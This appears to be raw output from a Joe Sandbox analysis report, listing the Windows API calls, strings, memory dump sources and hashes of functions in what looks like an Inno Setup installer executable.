                                                                                                                                        • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1452528299-0
                                                                                                                                        • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                                                        • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                                                                                                        • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                                                                                                        • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                                                        • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                                                        • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                        APIs
                                                                                                                                        • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                                                                                                        • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                                                                                                        • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                                                                                                        • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                                                                        • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                                                                        • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                                                                        • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                                                                        • API String ID: 2323315520-3614243559
                                                                                                                                        • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                                                        • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                                                                        • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                                                                        • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 0045862F
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(021D3858,00000000,004588C2,?,?,021D3858,00000000,?,00458FBE,?,021D3858,00000000), ref: 00458638
                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(021D3858,021D3858), ref: 00458642
                                                                                                                                        • GetCurrentProcessId.KERNEL32(?,021D3858,00000000,004588C2,?,?,021D3858,00000000,?,00458FBE,?,021D3858,00000000), ref: 0045864B
                                                                                                                                        • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                                                                        • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021D3858,021D3858), ref: 004586CF
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                                                                        • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                        • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                                                                        • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                                                                        • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                                                                          • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                                                                        • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                                                                        • API String ID: 770386003-3271284199
                                                                                                                                        • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                                        • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                                                                        • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                                                                        • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                                                          • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                                                          • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                                                          • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4), ref: 004783CC
                                                                                                                                          • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                                                          • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,021D2BD4,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                                                                        • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                                                                        • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                                                                        • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                                                                        • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                                                                        • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                                                                        • API String ID: 883996979-221126205
                                                                                                                                        • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                                                                        • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                                                                        • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                                                                        • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                                                                        APIs
                                                                                                                                        • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                                                                        • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSendShowWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1631623395-0
                                                                                                                                        • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                                                        • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                                                                        • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                                                                        • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                                                                        APIs
                                                                                                                                        • IsIconic.USER32(?), ref: 00418393
                                                                                                                                        • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                                                                        • GetWindowRect.USER32(?), ref: 004183CC
                                                                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                                                                        • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                                                                        • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                                                                        • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                        • String ID: ,
                                                                                                                                        • API String ID: 2266315723-3772416878
                                                                                                                                        • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                                                        • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                                                                        • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                                                                        • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                                                                        • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                        • API String ID: 107509674-3733053543
                                                                                                                                        • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                                        • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                                                                        • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                                                                        • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                                                                        • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                                                                        • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                                                                        • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$CryptVersion
                                                                                                                                        • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                                                                        • API String ID: 1951258720-508647305
                                                                                                                                        • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                                                        • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                                                                        • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                                                                        • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                                                                        • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                                                                        • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileFind$AttributesCloseFirstNext
                                                                                                                                        • String ID: isRS-$isRS-???.tmp
                                                                                                                                        • API String ID: 134685335-3422211394
                                                                                                                                        • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                                                        • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                                                                        • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                                                                        • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
APIs
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
• PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
• SetForegroundWindow.USER32(?), ref: 00457649
• NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
Strings
• Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: MessagePostWindow$ForegroundNtdllProc_
• String ID: Cannot evaluate variable because [Code] isn't running yet
• API String ID: 2236967946-3182603685
• Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
• Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
• Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
• Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
• GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: GetDiskFreeSpaceExA$kernel32.dll
• API String ID: 1646373207-3712701948
• Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
• Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
• Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
• Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
APIs
• IsIconic.USER32(?), ref: 00417D0F
• SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
• GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
• SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
Strings
Memory Dump Source
• Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_400000_list.jbxd
Similarity
• API ID: Window$Placement$Iconic
• String ID: ,
• API String ID: 568898626-3772416878
• Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
• Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
• Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
